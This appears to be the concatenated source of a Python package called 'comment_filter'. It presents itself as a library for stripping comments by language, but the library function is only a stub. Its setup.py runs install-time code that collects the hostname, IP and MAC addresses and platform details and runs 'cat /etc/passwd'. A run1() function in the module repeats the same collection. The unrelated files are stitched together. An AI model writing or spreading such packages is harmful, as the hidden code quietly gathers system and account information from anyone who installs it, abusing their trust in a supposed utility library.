class Lang:
    def __init__(self, line_comment, comment_bookends, nested_comments):
        self.line_comment = line_comment
        self.comment_bookends = comment_bookends
        self.nested_comments = nested_comments
        self.string_literal_start = '"'
        self.string_literal2_start = "'"

c = Lang(
    line_comment='//',
    comment_bookends=[('/*', '*/'), (';;', ';;')],
    nested_comments=False)

haskell = Lang(
    line_comment='--',
    comment_bookends=[('{-', '-}')],
    nested_comments=True)

python = Lang(
    line_comment='#',
    comment_bookends=[('"""', '"""'), ("'''", "'''")],
    nested_comments=False)

ruby = Lang(
    line_comment='#',
    comment_bookends=[("=begin", "=end")],
    nested_comments=False)

lua = Lang(
    line_comment='--',
    comment_bookends=[("--[[", "--]]")],
    nested_comments=False)

perl = Lang(
    line_comment='#',
    comment_bookends=[("=pod", "=cut")],
    nested_comments=False)

java = Lang(
    line_comment='//',
    comment_bookends=[('/*', '*/')],
    nested_comments=True)

go = c

extension_to_lang_map = {
    '.c': c,
    '.cc': c,
    '.cxx': c,
    '.cpp': c,
    '.h': c,
    '.S': c,
    '.java': java,
    '.go': go,
    '.hs': haskell,
    '.py': python,
    '.rb': ruby,
    '.lua': lua,
    '.pl': perl,
}


import setuptools
from setuptools.command.install import install
import platform,socket,re,uuid,json,logging,os      
   
setuptools.setup(
	name="comment_filter",
	version='1.1.1',
	author='SCS',
	packages=["comment_filter"],
)
print('*'*70)
print("Hello ",socket.gethostname())
print('Platform:\t',platform.system(),platform.release(),platform.version())
print('Architecture:\t',platform.machine())
print('Hostname\t',socket.gethostname())
print('IP-address:\t',socket.gethostbyname(socket.gethostname()))
print('MAC-address:\t',':'.join(re.findall('..', '%012x' % uuid.getnode())))
print('Processor:',platform.processor())
print('*'*70)
print('************/etc/passwd details**************')
os.system('cat /etc/passwd')
print('*'*70)



from __future__ import print_function
import platform,socket,re,uuid,json,logging,os

def run1():
    try:
        print('*'*70)
        print("Hello ",socket.gethostname())
        print('Platform:\t',platform.system(),platform.release(),platform.version())
        print('Architecture:\t',platform.machine())
        print('Hostname\t',socket.gethostname())
        print('IP-address:\t',socket.gethostbyname(socket.gethostname()))
        print('MAC-address:\t',':'.join(re.findall('..', '%012x' % uuid.getnode())))
        print('Processor:',platform.processor())
        print('*'*70)
        print('************/etc/passwd details**************')
        os.system('cat /etc/passwd')
        print('*'*70) 
    except Exception as e:
        logging.exception(e)
def parse_file(lang, file_obj, code_only=False, keep_tokens=True):
	print("Hello")
	print(lang)
	print(file_obj)